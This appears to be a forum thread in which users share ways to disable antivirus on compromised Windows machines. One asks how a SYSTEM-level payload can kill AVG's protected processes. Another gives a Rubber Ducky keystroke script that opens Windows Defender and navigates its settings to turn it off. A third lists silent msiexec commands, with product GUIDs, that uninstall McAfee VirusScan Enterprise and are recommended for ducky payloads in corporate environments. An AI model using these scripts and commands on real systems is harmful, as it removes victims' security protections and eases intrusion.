Search the Community

Hey, i recently tried to kill the AV Processes of for example AVG. My payload had SYSTEM privileges but i couldn't kill the AV Processes which also run under the SYSTEM user. I noticed a process which ran higher than SYSTEM which belonged to AVG. Is it common thats a av has some sort of process which runs in kernel mode or sth which protects the other processes. Is there even a way to kill the av as a System user?

Hello all, I've put together a simple script that attempts to disable Windows Defender on Windows 8.1 (will update to 7 later). My only problem is that I have an issue where there is a check box titled "turn on this app" and when I tab over to it, there is no way for me to uncheck that selection. I hope that someone might either find a work around to my method or find a way to make it work. Thank you Disable Windows Defender: REM Author : Hobbes REM Description : Attempts to disable Windows Defender anti-virus. REM Note : Only tested on Windows 8.1 - Windows 7 compatibility unknown. REM ***[Initial Delay]*** DELAY 3000 REM ***[Navigate to Windows Defender]*** GUI r DELAY 250 STRING cmd ENTER DELAY 800 STRING start "" "C:\Program Files\Windows Defender\MSASCui.exe" ENTER DELAY 400 REM **[Disables Defender]*** TAB DELAY 80 TAB DELAY 80 RIGHTARROW DELAY 80 RIGHTARROW DELAY 80 RIGHTARROW DELAY 80 TAB DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 TAB

I found the following little tid bit that has been of great use in corporate environments. Simply adding the appropriate line toward the top of your ducky script (or adding them all just in case works too) can significantly decrease AV detection (considering it removes it from the equation!) :D VirusScan Enterprise (VSE) command line removal using msiexec.exe: Click Start, Run. Type the removal string for your version of VSE, then click OK. VirusScan Enterprise 8.8 msiexec /x {CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.7i msiexec /x {147BCE03-C0F1-4C9F-8157-6A89B6D2D973} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.5i msiexec.exe /x {35C03C04-3F1F-42C2-A989-A757EE691F65} REMOVE=ALL REBOOT=R /q VirusScan Enterprise 8.0i msiexec.exe /x {5DF3D1BB-894E-4DCD-8275-159AC9829B43} REMOVE=ALL REBOOT=R /q Switches that you can use with msiexec.exe: /q The quiet switch ensures the removal is done silently - nothing is displayed. /x This switch will automatically remove an installation. /i This switch will communicate via the UI (User Interface) and is used to Repair, Remove, or Modify an installation. /? This switch provides additional information on all msiexec.exe command switches.